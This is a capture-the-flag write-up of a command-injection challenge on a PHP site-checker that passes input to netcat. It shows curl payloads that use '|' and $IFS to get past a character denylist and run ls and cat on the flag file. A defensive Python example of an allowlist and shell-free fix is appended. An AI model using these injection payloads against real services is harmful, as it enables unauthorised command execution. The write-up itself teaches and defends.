Social Checker


Social Checker - check if your favourite social media site is online!


After visiting the challenge URL I was presented with a pulldown list of Social Media services and a Check It! button, which appeared to conduct a port check and return the results:

I viewed the HTML source to determine what action the submit button was taking and found that a PHP script was called and passed a url form field:

function doCheck() {
  $.post("check.php", {"url": $("#url").val()}, function(data) {
    // callback body not shown in the captured source; it renders the check result into the page
  });
}

My next step was to recreate the same form POST with curl to make it easier to manipulate the form data:

$ curl -X POST -d '' ''

I submitted junk data for the url value as an attempt to invoke an error condition, which revealed that netcat was being called by the PHP script:

$ curl -X POST -d 'url=junk' ''

nc: bad address 'junk'

I spent some time testing various methods for including additional parameters and shell commands to cause a remote command execution and found some humorous messages when specific characters weren't allowed. For example, including a semi-colon produces a YouTube link to a montage of Consuela from Family Guy saying, "No", and using whitespace results in a YouTube link to the song Out Of Space by The Prodigy.

$ curl -X POST '' -d 'url=localhost;ls'

nice try -

I was able to work past the character restrictions using a pipe (|) instead of a semi-colon and the Internal Field Separator shell variable ($IFS) in place of a space:

$ curl -X POST '' -d 'url=localhost|ls$IFS.'

ls: 80: No such file or directory

After a bit more testing I was able to create a payload to dump the flag file:

$ curl -X POST '' -d 'url=localhost|cat$IFS./flag.txt'

he2021{1ts_fun_t0_1nj3kt_k0mmand5}cat: can't open '80': No such file or directory
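The filter behaviour and a defender's fix, as an added example that is not code from the challenge or the original post: a denylist like the one observed (blocking ';' and whitespace) still admits the `|`/`$IFS` payload, while an allowlist hostname check combined with a shell-free argument list rejects it. The exact denylist and the `nc <url> 80` command line are assumptions reconstructed from the responses above (the trailing `80` is what produced `ls: 80: No such file or directory`).

```python
import re
import subprocess

# Assumed reconstruction of the challenge's denylist: it rejected ';' and whitespace
# but nothing else, which is why '|' and '$IFS' slipped through.
DENY = re.compile(r"[;\s]")

# Allowlist: hostname labels per RFC 1123 (letters, digits, hyphens, dots), max 253 chars.
HOSTNAME = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def denylist_allows(url: str) -> bool:
    """Mimics the observed filter: True when no ';' or whitespace is present."""
    return DENY.search(url) is None


def allowlist_allows(url: str) -> bool:
    """True only when the input is syntactically a hostname or IPv4 literal."""
    return HOSTNAME.fullmatch(url) is not None


def vulnerable_shell_command(url: str) -> str:
    """Assumed shape of the original call: one string handed to a shell.
    Anything the filter lets through is interpreted by the shell, and the
    trailing ' 80' becomes an argument of the injected command."""
    return f"nc {url} 80"


def build_nc_argv(url: str, port: int = 80) -> list[str]:
    """Hardened form: validate against the allowlist, then pass an argv list
    so no shell ever parses the user input; '|' and '$IFS' stay literal."""
    if not allowlist_allows(url):
        raise ValueError(f"rejected host: {url!r}")
    return ["nc", "-zv", url, str(port)]


def run_check(url: str, port: int = 80) -> bool:
    """Runs the port check without shell=True; returns True when nc exits 0."""
    argv = build_nc_argv(url, port)
    result = subprocess.run(argv, capture_output=True, timeout=5)
    return result.returncode == 0


if __name__ == "__main__":
    payload = "localhost|ls$IFS."          # the writeup's bypass string
    print("denylist allows payload:", denylist_allows(payload))
    print("allowlist allows payload:", allowlist_allows(payload))
    print("shell would run:", vulnerable_shell_command(payload))
```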
